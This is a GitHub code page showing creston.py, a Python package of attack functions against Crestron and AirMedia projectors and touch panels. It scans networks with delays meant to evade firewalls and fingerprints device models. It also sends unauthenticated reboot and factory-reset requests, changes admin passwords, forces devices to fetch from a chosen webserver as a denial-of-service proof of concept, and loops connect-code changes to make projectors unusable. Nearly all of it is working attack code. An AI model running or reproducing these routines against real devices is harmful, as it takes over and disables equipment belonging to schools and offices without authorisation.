-
Notifications
You must be signed in to change notification settings - Fork 0
/
creston.py
236 lines (213 loc) · 7.63 KB
/
creston.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
#------------------------------------------------------------------------------------
#
# Creston Package
#
# Contains Important Funcitons
#
#
#
#
#-----------------------------------------------------------------------------------
import requests
import ipaddress
import hashlib
import time
import random
import urllib3
urllib3.disable_warnings()
#This funciton will scan the specified ip range to identify projectors.
#In our network we found that only the projectors had port 443 open.
#In other environments this function may idntify printers, web servers, and other IOT devices.
def network_scan(ip_range):
#Create List To Hold All Possible Hosts On The Network
allHosts=[]
#Add All Possible Hosts To List
for ip in ipaddress.ip_network(str(ip_range)):
allHosts.append(ip)
#Drop Newtork ID and Broadcast Address
allHosts.pop(0)
del allHosts[-1]
#Create List To Hold Live Hosts
onlineHosts =[]
#Send HTTPS requests to See if port is open
for hosts in allHosts:
url="https://" + str(hosts) + "/"
try:
#Sends Rquest
check = requests.get(url = url, timeout=5,verify=False)
#Grabs Hash of Request
systemOnline = hashlib.md5(check.text.encode())
#Checks if Response is Same As Known Projector Samples
if(systemOnline):
print("PROJECTOR: " + url)
onlineHosts.append(str(ipaddress.IPv4Address(hosts)))
#Generate a random wait time
waitTime = random.random() * 3.0
#Wait the Random Time (This is done to try to Look less suspicious to Firewalls)
time.sleep(waitTime)
#Handle Any Exceptions (Generally Caused by Port being closed
except requests.exceptions.RequestException as e:
pass
#Clean UP onlineHosts So Its Only IPs
return onlineHosts
#This funciton will identify the model of a device based on specific behaviors observed.
def model_type(hosts):
#Send HTTPS requests to See if port is open
model_dictionary = {}
for host in hosts:
#Test for tws760 url
tswURL = "http://" + host + "/webView/CommonUI"
try:
tswTest = requests.get(tswURL, verify=False)
except requests.exceptions.RequestException as e:
tswTest = "Nope"
print("An Error Occured When Connecting")
#Test for the original projector we found
theOGurl = "http://" + host + "/cgi-bin/login.cgi?lang=en&src=AwLoginDownload.html"
try:
theOGTest = requests.get(theOGurl, verify=False)
except requests.exceptions.RequestException as e:
theOGTest = "Nope"
print("An Error Occured When Connecting")
#Test for air2media version
air2url = "http://" + host + "/index_airmedia.html"
try:
air2Test = requests.get(air2url, verify=False)
except requests.exceptions.RequestException as e:
air2Test = "Nope"
print("An Error Occured When Connecting")
#Verify a unique string found in the air2media version
if "var present_timeout = 1000;" in air2Test.text:
print(host + " is a AirMedia2")
model_dictionary[host] = 'AirMedia2'
#Verify existence of unique page found only in the OG device.
elif theOGTest.status_code == 200:
print(host + " is an OG")
model_dictionary[host] = 'OG'
#Verify a unique string found only inthe tsw760.
elif "Display the application" in tswTest.text:
print(host + " is a tsw760")
model_dictionary[host] = 'TSW760'
#verify unique string found in a model we did not develop for.
#Please note, tho we did not develop this devie it is vulnerable via the management port
elif "DispBlock OvHidden FontLatoLight Fs30 Blue" in air2Test.text:
print(host + " is the one we did dev for")
model_dictionary[host] = 'Ignore'
return model_dictionary
#Perform a login to the OG version
def og_Login(host,username,password):
print(host)
#URL of Projector
urlF="https://" + host + "/cgi-bin/login.cgi?lang=en&src=AwLoginAdmin.html"
#POST Data
data = {
'login': 'admin',
'account': username,
'password': password,
'Login.x':'56',
'Login.y':'16'
}
#Send Login Request
try:
login = requests.post(url=urlF, data = data, verify=False)
except requests.exceptions.RequestException as e:
print("An Error Occured When Connecting")
#Pull Out Cookie So You Can Keep Making Requests
cookieStart=login.text.split("document.write(\"<form name=\'form0\' action=\'/cgi-bin/reboot.cgi?lang=en&")
cookieMid=cookieStart[1].split("'")
cookie=cookieMid[0]
return cookie
#This method will cause the device to reboot
#This code will change its method based on the version
def reboot(host,model,username,password):
if model == 'TSW760':
#Payload
Data = {"Device": {"DeviceOperations": {"Reboot": "true"}}}
#Send Requeste
try:
reboot = requests.post(url="http://" + host + "/Device/DeviceOperations", json=Data, verify=False)
except requests.exceptions.RequestException as e:
print("An Error Occured When Connecting")
elif model == 'OG':
cookie = og_Login(host,username,password)
#Target URL
url = "https://"+ host + "/cgi-bin/return.cgi"
#Payload
data = {
"command" : "<Send><seid>" + cookie + "</seid><Factory>reboot</Factory></Send>"
}
#Send Request
try:
reboot = requests.post(url=url,data=data, verify=False)
except requests.exceptions.RequestException as e:
print("An Error Occured When Connecting")
print("Reboot Incoming")
else:
pass
#This code will factory restore the device based on the version number
#Please note that this can knock the device off the network and will require manual reconfiguration to fix.
def restore(host,model):
if model == 'TSW760':
#Payload
Data = {"Device": {"DeviceOperations": {"Restore": "true"}}}
#Send Request
try:
restore = requests.post(url="http://" + host + "/Device/DeviceOperations", json=Data, verify=False)
except requests.exceptions.RequestException as e:
print("An Error Occured When Connecting")
else:
pass
#This code will change the password of a projector.
def change_pass(host, username, password, newpass):
cookie = og_Login(host,username,password)
#Target URL
url = "https://"+ host + "/cgi-bin/return.cgi"
#Payload
data = {
"command" : "<Send><seid>" + cookie + "</seid><name>LONG_ADMIN_PWD</name><value>" + newpass + "</value></Send>"
}
#Send Request
try:
changePass = requests.post(url=url,data=data, verify=False)
except requests.exceptions.RequestException as e:
print("An Error Occured When Connecting")
print("Password Change Request Sent")
#This code is a POC
#It can send a web request.
#If this was looped with all devices it could potentially take a device offline
def web_dos(host,username,password,webserver):
cookie = og_Login(host,username,password)
#Target URL
url = "https://"+ host + "/cgi-bin/return.cgi"
#Payload
data = {
"command" : "<Send><seid>" + cookie + "</seid><upload><protocol>http</protocol><address>" + webserver + "</address><logo>index.jpg</logo></upload></Send>"
}
#Send Request
try:
webdos = requests.post(url=url,data=data, verify=False)
except requests.exceptions.RequestException as e:
print("An Error Occured When Connecting")
print("Web Request Sent")
#This code will begin cycling through various connect codes.
#Depending on the speed of the device, this may make the projector unoperational.
def code_cycle(host,username,password):
cookie = og_Login(host,username,password)
try:
while True:
#Generate Random Code
randomInt = random.randint(1,9999)
#Target URL
url = "https://"+ host + "/cgi-bin/return.cgi"
#Payload
data = {
'command' : '<Send><seid>' + cookie + '</seid><name>PREF_LOGINCODE</name><value>2</value><name>PREF_UNIVERSAL_LOGINCODE</name><value>' + str(randomInt) + '</value></Send>'
}
#Send Request
try:
cycle = requests.post(url=url,data=data, verify=False)
except requests.exceptions.RequestException as e:
print("An Error Occured When Connecting")
print("Cycle")
except KeyboardInterrupt:
pass